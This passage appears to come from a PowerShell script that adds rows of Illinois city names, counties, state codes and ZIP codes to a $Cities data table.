$Cities.Rows.Add("Winslow","Stephenson","Illinois","IL","17","61089") + $null = $Cities.Rows.Add("Woosung","Ogle","Illinois","IL","17","61091") + $null = $Cities.Rows.Add("Zcta 610hh","Carroll","Illinois","IL","17","610HH") + $null = $Cities.Rows.Add("Rockford","Winnebago","Illinois","IL","17","61101") + $null = $Cities.Rows.Add("Rockford","Winnebago","Illinois","IL","17","61102") + $null = $Cities.Rows.Add("Rockford","Winnebago","Illinois","IL","17","61103") + $null = $Cities.Rows.Add("Rockford","Winnebago","Illinois","IL","17","61104") + $null = $Cities.Rows.Add("Rockford","Winnebago","Illinois","IL","17","61107") + $null = $Cities.Rows.Add("Rockford","Winnebago","Illinois","IL","17","61108") + $null = $Cities.Rows.Add("Rockford","Winnebago","Illinois","IL","17","61109") + $null = $Cities.Rows.Add("Loves park","Winnebago","Illinois","IL","17","61111") + $null = $Cities.Rows.Add("Rockford","Winnebago","Illinois","IL","17","61112") + $null = $Cities.Rows.Add("Rockford","Winnebago","Illinois","IL","17","61114") + $null = $Cities.Rows.Add("Machesney park","Winnebago","Illinois","IL","17","61115") + $null = $Cities.Rows.Add("Zcta 611hh","Ogle","Illinois","IL","17","611HH") + $null = $Cities.Rows.Add("Rock island","Rock Island","Illinois","IL","17","61201") + $null = $Cities.Rows.Add("Albany","Whiteside","Illinois","IL","17","61230") + $null = $Cities.Rows.Add("Aledo","Mercer","Illinois","IL","17","61231") + $null = $Cities.Rows.Add("Andalusia","Rock Island","Illinois","IL","17","61232") + $null = $Cities.Rows.Add("Andover","Henry","Illinois","IL","17","61233") + $null = $Cities.Rows.Add("Annawan","Henry","Illinois","IL","17","61234") + $null = $Cities.Rows.Add("Atkinson","Henry","Illinois","IL","17","61235") + $null = $Cities.Rows.Add("Barstow","Rock Island","Illinois","IL","17","61236") + $null = $Cities.Rows.Add("Cambridge","Henry","Illinois","IL","17","61238") + $null = $Cities.Rows.Add("Carbon cliff","Rock Island","Illinois","IL","17","61239") + $null = $Cities.Rows.Add("Coal valley","Rock Island","Illinois","IL","17","61240") + $null = $Cities.Rows.Add("Green rock","Henry","Illinois","IL","17","61241") + $null = $Cities.Rows.Add("Cordova","Rock Island","Illinois","IL","17","61242") + $null = $Cities.Rows.Add("Deer grove","Whiteside","Illinois","IL","17","61243") + $null = $Cities.Rows.Add("East moline","Rock Island","Illinois","IL","17","61244") + $null = $Cities.Rows.Add("Erie","Whiteside","Illinois","IL","17","61250") + $null = $Cities.Rows.Add("Fenton","Whiteside","Illinois","IL","17","61251") + $null = $Cities.Rows.Add("Fulton","Whiteside","Illinois","IL","17","61252") + $null = $Cities.Rows.Add("Geneseo","Henry","Illinois","IL","17","61254") + $null = $Cities.Rows.Add("Hampton","Rock Island","Illinois","IL","17","61256") + $null = $Cities.Rows.Add("Hillsdale","Rock Island","Illinois","IL","17","61257") + $null = $Cities.Rows.Add("Illinois city","Rock Island","Illinois","IL","17","61259") + $null = $Cities.Rows.Add("Joy","Mercer","Illinois","IL","17","61260") + $null = $Cities.Rows.Add("Lyndon","Whiteside","Illinois","IL","17","61261") + $null = $Cities.Rows.Add("Lynn center","Henry","Illinois","IL","17","61262") + $null = $Cities.Rows.Add("Matherville","Mercer","Illinois","IL","17","61263") + $null = $Cities.Rows.Add("Milan","Rock Island","Illinois","IL","17","61264") + $null = $Cities.Rows.Add("Moline","Rock Island","Illinois","IL","17","61265") + $null = $Cities.Rows.Add("Morrison","Whiteside","Illinois","IL","17","61270") + $null = $Cities.Rows.Add("New boston","Mercer","Illinois","IL","17","61272") + $null = $Cities.Rows.Add("Orion","Henry","Illinois","IL","17","61273") + $null = $Cities.Rows.Add("Osco","Henry","Illinois","IL","17","61274") + $null = $Cities.Rows.Add("Port byron","Rock Island","Illinois","IL","17","61275") + $null = $Cities.Rows.Add("Preemption","Mercer","Illinois","IL","17","61276") + $null = $Cities.Rows.Add("Prophetstown","Whiteside","Illinois","IL","17","61277") + $null = $Cities.Rows.Add("Reynolds","Rock Island","Illinois","IL","17","61279") + $null = $Cities.Rows.Add("Sherrard","Mercer","Illinois","IL","17","61281") + $null = $Cities.Rows.Add("Silvis","Rock Island","Illinois","IL","17","61282") + $null = $Cities.Rows.Add("Tampico","Whiteside","Illinois","IL","17","61283") + $null = $Cities.Rows.Add("Taylor ridge","Rock Island","Illinois","IL","17","61284") + $null = $Cities.Rows.Add("Thomson","Carroll","Illinois","IL","17","61285") + $null = $Cities.Rows.Add("Zcta 612hh","Carroll","Illinois","IL","17","612HH") + $null = $Cities.Rows.Add("La salle","La Salle","Illinois","IL","17","61301") + $null = $Cities.Rows.Add("Amboy","Lee","Illinois","IL","17","61310") + $null = $Cities.Rows.Add("Ancona","Livingston","Illinois","IL","17","61311") + $null = $Cities.Rows.Add("Arlington","Bureau","Illinois","IL","17","61312") + $null = $Cities.Rows.Add("Blackstone","Livingston","Illinois","IL","17","61313") + $null = $Cities.Rows.Add("Buda","Bureau","Illinois","IL","17","61314") + $null = $Cities.Rows.Add("Bureau","Bureau","Illinois","IL","17","61315") + $null = $Cities.Rows.Add("Cedar point","La Salle","Illinois","IL","17","61316") + $null = $Cities.Rows.Add("Cherry","Bureau","Illinois","IL","17","61317") + $null = $Cities.Rows.Add("Compton","Lee","Illinois","IL","17","61318") + $null = $Cities.Rows.Add("Manville","Livingston","Illinois","IL","17","61319") + $null = $Cities.Rows.Add("Dalzell","Bureau","Illinois","IL","17","61320") + $null = $Cities.Rows.Add("Dana","La Salle","Illinois","IL","17","61321") + $null = $Cities.Rows.Add("Depue","Bureau","Illinois","IL","17","61322") + $null = $Cities.Rows.Add("Dover","Bureau","Illinois","IL","17","61323") + $null = $Cities.Rows.Add("Eldena","Lee","Illinois","IL","17","61324") + $null = $Cities.Rows.Add("Grand ridge","La Salle","Illinois","IL","17","61325") + $null = $Cities.Rows.Add("Granville","Putnam","Illinois","IL","17","61326") + $null = $Cities.Rows.Add("Hennepin","Putnam","Illinois","IL","17","61327") + $null = $Cities.Rows.Add("Kasbeer","Bureau","Illinois","IL","17","61328") + $null = $Cities.Rows.Add("Ladd","Bureau","Illinois","IL","17","61329") + $null = $Cities.Rows.Add("La moille","Bureau","Illinois","IL","17","61330") + $null = $Cities.Rows.Add("Lee center","Lee","Illinois","IL","17","61331") + $null = $Cities.Rows.Add("Leonore","La Salle","Illinois","IL","17","61332") + $null = $Cities.Rows.Add("Long point","Livingston","Illinois","IL","17","61333") + $null = $Cities.Rows.Add("Lostant","La Salle","Illinois","IL","17","61334") + $null = $Cities.Rows.Add("Mc nabb","Putnam","Illinois","IL","17","61335") + $null = $Cities.Rows.Add("Magnolia","Putnam","Illinois","IL","17","61336") + $null = $Cities.Rows.Add("Malden","Bureau","Illinois","IL","17","61337") + $null = $Cities.Rows.Add("Manlius","Bureau","Illinois","IL","17","61338") + $null = $Cities.Rows.Add("Mark","Putnam","Illinois","IL","17","61340") + $null = $Cities.Rows.Add("Marseilles","La Salle","Illinois","IL","17","61341") + $null = $Cities.Rows.Add("Mendota","La Salle","Illinois","IL","17","61342") + $null = $Cities.Rows.Add("Mineral","Bureau","Illinois","IL","17","61344") + $null = $Cities.Rows.Add("Neponset","Bureau","Illinois","IL","17","61345") + $null = $Cities.Rows.Add("New bedford","Bureau","Illinois","IL","17","61346") + $null = $Cities.Rows.Add("Oglesby","La Salle","Illinois","IL","17","61348") + $null = $Cities.Rows.Add("Ohio","Bureau","Illinois","IL","17","61349") + $null = $Cities.Rows.Add("Ottawa","La Salle","Illinois","IL","17","61350") + $null = $Cities.Rows.Add("Paw paw","Lee","Illinois","IL","17","61353") + $null = $Cities.Rows.Add("Peru","La Salle","Illinois","IL","17","61354") + $null = $Cities.Rows.Add("Princeton","Bureau","Illinois","IL","17","61356") + $null = $Cities.Rows.Add("Rutland","La Salle","Illinois","IL","17","61358") + $null = $Cities.Rows.Add("Seatonville","Bureau","Illinois","IL","17","61359") + $null = $Cities.Rows.Add("Seneca","La Salle","Illinois","IL","17","61360") + $null = $Cities.Rows.Add("Sheffield","Bureau","Illinois","IL","17","61361") + $null = $Cities.Rows.Add("Spring valley","Bureau","Illinois","IL","17","61362") + $null = $Cities.Rows.Add("Standard","Putnam","Illinois","IL","17","61363") + $null = $Cities.Rows.Add("Streator","La Salle","Illinois","IL","17","61364") + $null = $Cities.Rows.Add("Sublette","Lee","Illinois","IL","17","61367") + $null = $Cities.Rows.Add("Tiskilwa","Bureau","Illinois","IL","17","61368") + $null = $Cities.Rows.Add("Toluca","Marshall","Illinois","IL","17","61369") + $null = $Cities.Rows.Add("Tonica","La Salle","Illinois","IL","17","61370") + $null = $Cities.Rows.Add("Troy grove","La Salle","Illinois","IL","17","61372") + $null = $Cities.Rows.Add("Utica","La Salle","Illinois","IL","17","61373") + $null = $Cities.Rows.Add("Van orin","Bureau","Illinois","IL","17","61374") + $null = $Cities.Rows.Add("Varna","Marshall","Illinois","IL","17","61375") + $null = $Cities.Rows.Add("Normandy","Bureau","Illinois","IL","17","61376") + $null = $Cities.Rows.Add("Wenona","Marshall","Illinois","IL","17","61377") + $null = $Cities.Rows.Add("West brooklyn","Lee","Illinois","IL","17","61378") + $null = $Cities.Rows.Add("Wyanet","Bureau","Illinois","IL","17","61379") + $null = $Cities.Rows.Add("Zcta 613hh","Bureau","Illinois","IL","17","613HH") + $null = $Cities.Rows.Add("Galesburg","Knox","Illinois","IL","17","61401") + $null = $Cities.Rows.Add("Abingdon","Knox","Illinois","IL","17","61410") + $null = $Cities.Rows.Add("Adair","McDonough","Illinois","IL","17","61411") + $null = $Cities.Rows.Add("Alexis","Warren","Illinois","IL","17","61412") + $null = $Cities.Rows.Add("Alpha","Henry","Illinois","IL","17","61413") + $null = $Cities.Rows.Add("Altona","Knox","Illinois","IL","17","61414") + $null = $Cities.Rows.Add("Avon","Fulton","Illinois","IL","17","61415") + $null = $Cities.Rows.Add("Bardolph","McDonough","Illinois","IL","17","61416") + $null = $Cities.Rows.Add("Berwick","Warren","Illinois","IL","17","61417") + $null = $Cities.Rows.Add("Biggsville","Henderson","Illinois","IL","17","61418") + $null = $Cities.Rows.Add("Bishop hill","Henry","Illinois","IL","17","61419") + $null = $Cities.Rows.Add("Blandinsville","McDonough","Illinois","IL","17","61420") + $null = $Cities.Rows.Add("Bradford","Stark","Illinois","IL","17","61421") + $null = $Cities.Rows.Add("Bushnell","McDonough","Illinois","IL","17","61422") + $null = $Cities.Rows.Add("Cameron","Warren","Illinois","IL","17","61423") + $null = $Cities.Rows.Add("Camp grove","Marshall","Illinois","IL","17","61424") + $null = $Cities.Rows.Add("Carman","Henderson","Illinois","IL","17","61425") + $null = $Cities.Rows.Add("Castleton","Stark","Illinois","IL","17","61426") + $null = $Cities.Rows.Add("Cuba","Fulton","Illinois","IL","17","61427") + $null = $Cities.Rows.Add("Dahinda","Knox","Illinois","IL","17","61428") + $null = $Cities.Rows.Add("East galesburg","Knox","Illinois","IL","17","61430") + $null = $Cities.Rows.Add("Ellisville","Fulton","Illinois","IL","17","61431") + $null = $Cities.Rows.Add("Fairview","Fulton","Illinois","IL","17","61432") + $null = $Cities.Rows.Add("Galva","Henry","Illinois","IL","17","61434") + $null = $Cities.Rows.Add("Gerlaw","Warren","Illinois","IL","17","61435") + $null = $Cities.Rows.Add("Gilson","Knox","Illinois","IL","17","61436") + $null = $Cities.Rows.Add("Gladstone","Henderson","Illinois","IL","17","61437") + $null = $Cities.Rows.Add("Good hope","McDonough","Illinois","IL","17","61438") + $null = $Cities.Rows.Add("Henderson","Knox","Illinois","IL","17","61439") + $null = $Cities.Rows.Add("Industry","McDonough","Illinois","IL","17","61440") + $null = $Cities.Rows.Add("Ipava","Fulton","Illinois","IL","17","61441") + $null = $Cities.Rows.Add("Keithsburg","Mercer","Illinois","IL","17","61442") + $null = $Cities.Rows.Add("Kewanee","Henry","Illinois","IL","17","61443") + $null = $Cities.Rows.Add("Kirkwood","Warren","Illinois","IL","17","61447") + $null = $Cities.Rows.Add("Knoxville","Knox","Illinois","IL","17","61448") + $null = $Cities.Rows.Add("La fayette","Stark","Illinois","IL","17","61449") + $null = $Cities.Rows.Add("La harpe","Hancock","Illinois","IL","17","61450") + $null = $Cities.Rows.Add("Laura","Peoria","Illinois","IL","17","61451") + $null = $Cities.Rows.Add("Littleton","Schuyler","Illinois","IL","17","61452") + $null = $Cities.Rows.Add("Little york","Warren","Illinois","IL","17","61453") + $null = $Cities.Rows.Add("Lomax","Henderson","Illinois","IL","17","61454") + $null = $Cities.Rows.Add("Macomb","McDonough","Illinois","IL","17","61455") + $null = $Cities.Rows.Add("Maquon","Knox","Illinois","IL","17","61458") + $null = $Cities.Rows.Add("Marietta","Fulton","Illinois","IL","17","61459") + $null = $Cities.Rows.Add("Media","Henderson","Illinois","IL","17","61460") + $null = $Cities.Rows.Add("Monmouth","Warren","Illinois","IL","17","61462") + $null = $Cities.Rows.Add("New windsor","Mercer","Illinois","IL","17","61465") + $null = $Cities.Rows.Add("North henderson","Mercer","Illinois","IL","17","61466") + $null = $Cities.Rows.Add("Oneida","Knox","Illinois","IL","17","61467") + $null = $Cities.Rows.Add("Opheim","Henry","Illinois","IL","17","61468") + $null = $Cities.Rows.Add("Oquawka","Henderson","Illinois","IL","17","61469") + $null = $Cities.Rows.Add("Prairie city","McDonough","Illinois","IL","17","61470") + $null = $Cities.Rows.Add("Raritan","Henderson","Illinois","IL","17","61471") + $null = $Cities.Rows.Add("Rio","Knox","Illinois","IL","17","61472") + $null = $Cities.Rows.Add("Roseville","Warren","Illinois","IL","17","61473") + $null = $Cities.Rows.Add("Saint augustine","Knox","Illinois","IL","17","61474") + $null = $Cities.Rows.Add("Sciota","McDonough","Illinois","IL","17","61475") + $null = $Cities.Rows.Add("Seaton","Mercer","Illinois","IL","17","61476") + $null = $Cities.Rows.Add("Smithfield","Fulton","Illinois","IL","17","61477") + $null = $Cities.Rows.Add("Smithshire","Warren","Illinois","IL","17","61478") + $null = $Cities.Rows.Add("Speer","Stark","Illinois","IL","17","61479") + $null = $Cities.Rows.Add("Stronghurst","Henderson","Illinois","IL","17","61480") + $null = $Cities.Rows.Add("Table grove","Fulton","Illinois","IL","17","61482") + $null = $Cities.Rows.Add("Toulon","Stark","Illinois","IL","17","61483") + $null = $Cities.Rows.Add("Vermont","Fulton","Illinois","IL","17","61484") + $null = $Cities.Rows.Add("Victoria","Knox","Illinois","IL","17","61485") + $null = $Cities.Rows.Add("Viola","Mercer","Illinois","IL","17","61486") + $null = $Cities.Rows.Add("Wataga","Knox","Illinois","IL","17","61488") + $null = $Cities.Rows.Add("Williamsfield","Knox","Illinois","IL","17","61489") + $null = $Cities.Rows.Add("Woodhull","Henry","Illinois","IL","17","61490") + $null = $Cities.Rows.Add("Wyoming","Stark","Illinois","IL","17","61491") + $null = $Cities.Rows.Add("Zcta 614hh","Henderson","Illinois","IL","17","614HH") + $null = $Cities.Rows.Add("Astoria","Fulton","Illinois","IL","17","61501") + $null = $Cities.Rows.Add("Benson","Woodford","Illinois","IL","17","61516") + $null = $Cities.Rows.Add("Brimfield","Peoria","Illinois","IL","17","61517") + $null = $Cities.Rows.Add("Bryant","Fulton","Illinois","IL","17","61519") + $null = $Cities.Rows.Add("Canton","Fulton","Illinois","IL","17","61520") + $null = $Cities.Rows.Add("Chillicothe","Peoria","Illinois","IL","17","61523") + $null = $Cities.Rows.Add("Dunfermline","Fulton","Illinois","IL","17","61524") + $null = $Cities.Rows.Add("Dunlap","Peoria","Illinois","IL","17","61525") + $null = $Cities.Rows.Add("Edelstein","Peoria","Illinois","IL","17","61526") + $null = $Cities.Rows.Add("Edwards","Peoria","Illinois","IL","17","61528") + $null = $Cities.Rows.Add("Elmwood","Peoria","Illinois","IL","17","61529") + $null = $Cities.Rows.Add("Eureka","Woodford","Illinois","IL","17","61530") + $null = $Cities.Rows.Add("Middlegrove","Fulton","Illinois","IL","17","61531") + $null = $Cities.Rows.Add("Forest city","Mason","Illinois","IL","17","61532") + $null = $Cities.Rows.Add("Glasford","Peoria","Illinois","IL","17","61533") + $null = $Cities.Rows.Add("Green valley","Tazewell","Illinois","IL","17","61534") + $null = $Cities.Rows.Add("Groveland","Tazewell","Illinois","IL","17","61535") + $null = $Cities.Rows.Add("Hanna city","Peoria","Illinois","IL","17","61536") + $null = $Cities.Rows.Add("Henry","Marshall","Illinois","IL","17","61537") + $null = $Cities.Rows.Add("Kingston mines","Peoria","Illinois","IL","17","61539") + $null = $Cities.Rows.Add("Lacon","Marshall","Illinois","IL","17","61540") + $null = $Cities.Rows.Add("La rose","Marshall","Illinois","IL","17","61541") + $null = $Cities.Rows.Add("Lewistown","Fulton","Illinois","IL","17","61542") + $null = $Cities.Rows.Add("Liverpool","Fulton","Illinois","IL","17","61543") + $null = $Cities.Rows.Add("London mills","Fulton","Illinois","IL","17","61544") + $null = $Cities.Rows.Add("Cazenovia","Woodford","Illinois","IL","17","61545") + $null = $Cities.Rows.Add("Manito","Mason","Illinois","IL","17","61546") + $null = $Cities.Rows.Add("Mapleton","Peoria","Illinois","IL","17","61547") + $null = $Cities.Rows.Add("Metamora","Woodford","Illinois","IL","17","61548") + $null = $Cities.Rows.Add("Morton","Tazewell","Illinois","IL","17","61550") + $null = $Cities.Rows.Add("Mossville","Peoria","Illinois","IL","17","61552") + $null = $Cities.Rows.Add("Pekin","Tazewell","Illinois","IL","17","61554") + $null = $Cities.Rows.Add("Princeville","Peoria","Illinois","IL","17","61559") + $null = $Cities.Rows.Add("Putnam","Putnam","Illinois","IL","17","61560") + $null = $Cities.Rows.Add("Roanoke","Woodford","Illinois","IL","17","61561") + $null = $Cities.Rows.Add("Saint david","Fulton","Illinois","IL","17","61563") + $null = $Cities.Rows.Add("South pekin","Tazewell","Illinois","IL","17","61564") + $null = $Cities.Rows.Add("Sparland","Marshall","Illinois","IL","17","61565") + $null = $Cities.Rows.Add("Topeka","Mason","Illinois","IL","17","61567") + $null = $Cities.Rows.Add("Tremont","Tazewell","Illinois","IL","17","61568") + $null = $Cities.Rows.Add("Trivoli","Peoria","Illinois","IL","17","61569") + $null = $Cities.Rows.Add("Washburn","Woodford","Illinois","IL","17","61570") + $null = $Cities.Rows.Add("Sunnyland","Tazewell","Illinois","IL","17","61571") + $null = $Cities.Rows.Add("Yates city","Knox","Illinois","IL","17","61572") + $null = $Cities.Rows.Add("Zcta 615hh","Fulton","Illinois","IL","17","615HH") + $null = $Cities.Rows.Add("Peoria","Peoria","Illinois","IL","17","61602") + $null = $Cities.Rows.Add("Peoria heights","Peoria","Illinois","IL","17","61603") + $null = $Cities.Rows.Add("Peoria","Peoria","Illinois","IL","17","61604") + $null = $Cities.Rows.Add("Peoria","Peoria","Illinois","IL","17","61605") + $null = $Cities.Rows.Add("Peoria","Peoria","Illinois","IL","17","61606") + $null = $Cities.Rows.Add("Bartonville","Peoria","Illinois","IL","17","61607") + $null = $Cities.Rows.Add("Zcta 61610","Tazewell","Illinois","IL","17","61610") + $null = $Cities.Rows.Add("East peoria","Tazewell","Illinois","IL","17","61611") + $null = $Cities.Rows.Add("Peoria heights","Peoria","Illinois","IL","17","61614") + $null = $Cities.Rows.Add("Peoria","Peoria","Illinois","IL","17","61615") + $null = $Cities.Rows.Add("Zcta 616hh","Peoria","Illinois","IL","17","616HH") + $null = $Cities.Rows.Add("Bloomington","McLean","Illinois","IL","17","61701") + $null = $Cities.Rows.Add("Bloomington","McLean","Illinois","IL","17","61704") + $null = $Cities.Rows.Add("Anchor","McLean","Illinois","IL","17","61720") + $null = $Cities.Rows.Add("Armington","Tazewell","Illinois","IL","17","61721") + $null = $Cities.Rows.Add("Arrowsmith","McLean","Illinois","IL","17","61722") + $null = $Cities.Rows.Add("Atlanta","Logan","Illinois","IL","17","61723") + $null = $Cities.Rows.Add("Bellflower","McLean","Illinois","IL","17","61724") + $null = $Cities.Rows.Add("Carlock","McLean","Illinois","IL","17","61725") + $null = $Cities.Rows.Add("Chenoa","McLean","Illinois","IL","17","61726") + $null = $Cities.Rows.Add("Clinton","De Witt","Illinois","IL","17","61727") + $null = $Cities.Rows.Add("Colfax","McLean","Illinois","IL","17","61728") + $null = $Cities.Rows.Add("Congerville","Woodford","Illinois","IL","17","61729") + $null = $Cities.Rows.Add("Cooksville","McLean","Illinois","IL","17","61730") + $null = $Cities.Rows.Add("Cropsey","McLean","Illinois","IL","17","61731") + $null = $Cities.Rows.Add("Danvers","McLean","Illinois","IL","17","61732") + $null = $Cities.Rows.Add("Deer creek","Tazewell","Illinois","IL","17","61733") + $null = $Cities.Rows.Add("Delavan","Tazewell","Illinois","IL","17","61734") + $null = $Cities.Rows.Add("Dewitt","De Witt","Illinois","IL","17","61735") + $null = $Cities.Rows.Add("Holder","McLean","Illinois","IL","17","61736") + $null = $Cities.Rows.Add("Ellsworth","McLean","Illinois","IL","17","61737") + $null = $Cities.Rows.Add("El paso","Woodford","Illinois","IL","17","61738") + $null = $Cities.Rows.Add("Fairbury","Livingston","Illinois","IL","17","61739") + $null = $Cities.Rows.Add("Flanagan","Livingston","Illinois","IL","17","61740") + $null = $Cities.Rows.Add("Forrest","Livingston","Illinois","IL","17","61741") + $null = $Cities.Rows.Add("Goodfield","Woodford","Illinois","IL","17","61742") + $null = $Cities.Rows.Add("Graymont","Livingston","Illinois","IL","17","61743") + $null = $Cities.Rows.Add("Gridley","McLean","Illinois","IL","17","61744") + $null = $Cities.Rows.Add("Heyworth","McLean","Illinois","IL","17","61745") + $null = $Cities.Rows.Add("Hopedale","Tazewell","Illinois","IL","17","61747") + $null = $Cities.Rows.Add("Hudson","McLean","Illinois","IL","17","61748") + $null = $Cities.Rows.Add("Kenney","De Witt","Illinois","IL","17","61749") + $null = $Cities.Rows.Add("Lane","De Witt","Illinois","IL","17","61750") + $null = $Cities.Rows.Add("Le roy","McLean","Illinois","IL","17","61752") + $null = $Cities.Rows.Add("Lexington","McLean","Illinois","IL","17","61753") + $null = $Cities.Rows.Add("Mc lean","McLean","Illinois","IL","17","61754") + $null = $Cities.Rows.Add("Mackinaw","Tazewell","Illinois","IL","17","61755") + $null = $Cities.Rows.Add("Maroa","Macon","Illinois","IL","17","61756") + $null = $Cities.Rows.Add("Merna","McLean","Illinois","IL","17","61758") + $null = $Cities.Rows.Add("Minier","Tazewell","Illinois","IL","17","61759") + $null = $Cities.Rows.Add("Minonk","Woodford","Illinois","IL","17","61760") + $null = $Cities.Rows.Add("Normal","McLean","Illinois","IL","17","61761") + $null = $Cities.Rows.Add("Pontiac","Livingston","Illinois","IL","17","61764") + $null = $Cities.Rows.Add("Saunemin","Livingston","Illinois","IL","17","61769") + $null = $Cities.Rows.Add("Saybrook","McLean","Illinois","IL","17","61770") + $null = $Cities.Rows.Add("Secor","Woodford","Illinois","IL","17","61771") + $null = $Cities.Rows.Add("Shirley","McLean","Illinois","IL","17","61772") + $null = $Cities.Rows.Add("Sibley","Ford","Illinois","IL","17","61773") + $null = $Cities.Rows.Add("Stanford","McLean","Illinois","IL","17","61774") + $null = $Cities.Rows.Add("Strawn","Livingston","Illinois","IL","17","61775") + $null = $Cities.Rows.Add("Towanda","McLean","Illinois","IL","17","61776") + $null = $Cities.Rows.Add("Wapella","De Witt","Illinois","IL","17","61777") + $null = $Cities.Rows.Add("Waynesville","De Witt","Illinois","IL","17","61778") + $null = $Cities.Rows.Add("Zcta 617hh","De Witt","Illinois","IL","17","617HH") + $null = $Cities.Rows.Add("Urbana","Champaign","Illinois","IL","17","61801") + $null = $Cities.Rows.Add("Zcta 61802","Champaign","Illinois","IL","17","61802") + $null = $Cities.Rows.Add("Allerton","Vermilion","Illinois","IL","17","61810") + $null = $Cities.Rows.Add("Alvin","Vermilion","Illinois","IL","17","61811") + $null = $Cities.Rows.Add("Armstrong","Vermilion","Illinois","IL","17","61812") + $null = $Cities.Rows.Add("Bement","Piatt","Illinois","IL","17","61813") + $null = $Cities.Rows.Add("Bismarck","Vermilion","Illinois","IL","17","61814") + $null = $Cities.Rows.Add("Bondville","Champaign","Illinois","IL","17","61815") + $null = $Cities.Rows.Add("Broadlands","Champaign","Illinois","IL","17","61816") + $null = $Cities.Rows.Add("Catlin","Vermilion","Illinois","IL","17","61817") + $null = $Cities.Rows.Add("Cerro gordo","Piatt","Illinois","IL","17","61818") + $null = $Cities.Rows.Add("Champaign","Champaign","Illinois","IL","17","61820") + $null = $Cities.Rows.Add("Champaign","Champaign","Illinois","IL","17","61821") + $null = $Cities.Rows.Add("Champaign","Champaign","Illinois","IL","17","61822") + $null = $Cities.Rows.Add("Cisco","Piatt","Illinois","IL","17","61830") + $null = $Cities.Rows.Add("Collison","Vermilion","Illinois","IL","17","61831") + $null = $Cities.Rows.Add("Danville","Vermilion","Illinois","IL","17","61832") + $null = $Cities.Rows.Add("Tilton","Vermilion","Illinois","IL","17","61833") + $null = $Cities.Rows.Add("Danville","Vermilion","Illinois","IL","17","61834") + $null = $Cities.Rows.Add("De land","Piatt","Illinois","IL","17","61839") + $null = $Cities.Rows.Add("Dewey","Champaign","Illinois","IL","17","61840") + $null = $Cities.Rows.Add("Fairmount","Vermilion","Illinois","IL","17","61841") + $null = $Cities.Rows.Add("Farmer city","De Witt","Illinois","IL","17","61842") + $null = $Cities.Rows.Add("Fisher","Champaign","Illinois","IL","17","61843") + $null = $Cities.Rows.Add("Fithian","Vermilion","Illinois","IL","17","61844") + $null = $Cities.Rows.Add("Foosland","Champaign","Illinois","IL","17","61845") + $null = $Cities.Rows.Add("Georgetown","Vermilion","Illinois","IL","17","61846") + $null = $Cities.Rows.Add("Gifford","Champaign","Illinois","IL","17","61847") + $null = $Cities.Rows.Add("Henning","Vermilion","Illinois","IL","17","61848") + $null = $Cities.Rows.Add("Homer","Champaign","Illinois","IL","17","61849") + $null = $Cities.Rows.Add("Indianola","Vermilion","Illinois","IL","17","61850") + $null = $Cities.Rows.Add("Ivesdale","Champaign","Illinois","IL","17","61851") + $null = $Cities.Rows.Add("Longview","Champaign","Illinois","IL","17","61852") + $null = $Cities.Rows.Add("Mahomet","Champaign","Illinois","IL","17","61853") + $null = $Cities.Rows.Add("Mansfield","Piatt","Illinois","IL","17","61854") + $null = $Cities.Rows.Add("Milmine","Piatt","Illinois","IL","17","61855") + $null = $Cities.Rows.Add("Monticello","Piatt","Illinois","IL","17","61856") + $null = $Cities.Rows.Add("Muncie","Vermilion","Illinois","IL","17","61857") + $null = $Cities.Rows.Add("Oakwood","Vermilion","Illinois","IL","17","61858") + $null = $Cities.Rows.Add("Ogden","Champaign","Illinois","IL","17","61859") + $null = $Cities.Rows.Add("Penfield","Champaign","Illinois","IL","17","61862") + $null = $Cities.Rows.Add("Pesotum","Champaign","Illinois","IL","17","61863") + $null = $Cities.Rows.Add("Philo","Champaign","Illinois","IL","17","61864") + $null = $Cities.Rows.Add("Potomac","Vermilion","Illinois","IL","17","61865") + $null = $Cities.Rows.Add("Rantoul","Champaign","Illinois","IL","17","61866") + $null = $Cities.Rows.Add("Ridge farm","Vermilion","Illinois","IL","17","61870") + $null = $Cities.Rows.Add("Royal","Champaign","Illinois","IL","17","61871") + $null = $Cities.Rows.Add("Sadorus","Champaign","Illinois","IL","17","61872") + $null = $Cities.Rows.Add("Saint joseph","Champaign","Illinois","IL","17","61873") + $null = $Cities.Rows.Add("Savoy","Champaign","Illinois","IL","17","61874") + $null = $Cities.Rows.Add("Seymour","Champaign","Illinois","IL","17","61875") + $null = $Cities.Rows.Add("Sidell","Vermilion","Illinois","IL","17","61876") + $null = $Cities.Rows.Add("Sidney","Champaign","Illinois","IL","17","61877") + $null = $Cities.Rows.Add("Thomasboro","Champaign","Illinois","IL","17","61878") + $null = $Cities.Rows.Add("Tolono","Champaign","Illinois","IL","17","61880") + $null = $Cities.Rows.Add("Weldon","De Witt","Illinois","IL","17","61882") + $null = $Cities.Rows.Add("Westville","Vermilion","Illinois","IL","17","61883") + $null = $Cities.Rows.Add("White heath","Piatt","Illinois","IL","17","61884") + $null = $Cities.Rows.Add("Zcta 618hh","De Witt","Illinois","IL","17","618HH") + $null = $Cities.Rows.Add("Arcola","Douglas","Illinois","IL","17","61910") + $null = $Cities.Rows.Add("Arthur","Douglas","Illinois","IL","17","61911") + $null = $Cities.Rows.Add("Ashmore","Coles","Illinois","IL","17","61912") + $null = $Cities.Rows.Add("Atwood","Douglas","Illinois","IL","17","61913") + $null = $Cities.Rows.Add("Bethany","Moultrie","Illinois","IL","17","61914") + $null = $Cities.Rows.Add("Brocton","Edgar","Illinois","IL","17","61917") + $null = $Cities.Rows.Add("Camargo","Douglas","Illinois","IL","17","61919") + $null = $Cities.Rows.Add("Charleston","Coles","Illinois","IL","17","61920") + $null = $Cities.Rows.Add("Chrisman","Edgar","Illinois","IL","17","61924") + $null = $Cities.Rows.Add("Dalton city","Moultrie","Illinois","IL","17","61925") + $null = $Cities.Rows.Add("Gays","Moultrie","Illinois","IL","17","61928") + $null = $Cities.Rows.Add("Hammond","Piatt","Illinois","IL","17","61929") + $null = $Cities.Rows.Add("Hindsboro","Douglas","Illinois","IL","17","61930") + $null = $Cities.Rows.Add("Humboldt","Coles","Illinois","IL","17","61931") + $null = $Cities.Rows.Add("Hume","Edgar","Illinois","IL","17","61932") + $null = $Cities.Rows.Add("Kansas","Edgar","Illinois","IL","17","61933") + $null = $Cities.Rows.Add("La place","Piatt","Illinois","IL","17","61936") + $null = $Cities.Rows.Add("Lovington","Moultrie","Illinois","IL","17","61937") + $null = $Cities.Rows.Add("Mattoon","Coles","Illinois","IL","17","61938") + $null = $Cities.Rows.Add("Metcalf","Edgar","Illinois","IL","17","61940") + $null = $Cities.Rows.Add("Murdock","Douglas","Illinois","IL","17","61941") + $null = $Cities.Rows.Add("Newman","Douglas","Illinois","IL","17","61942") + $null = 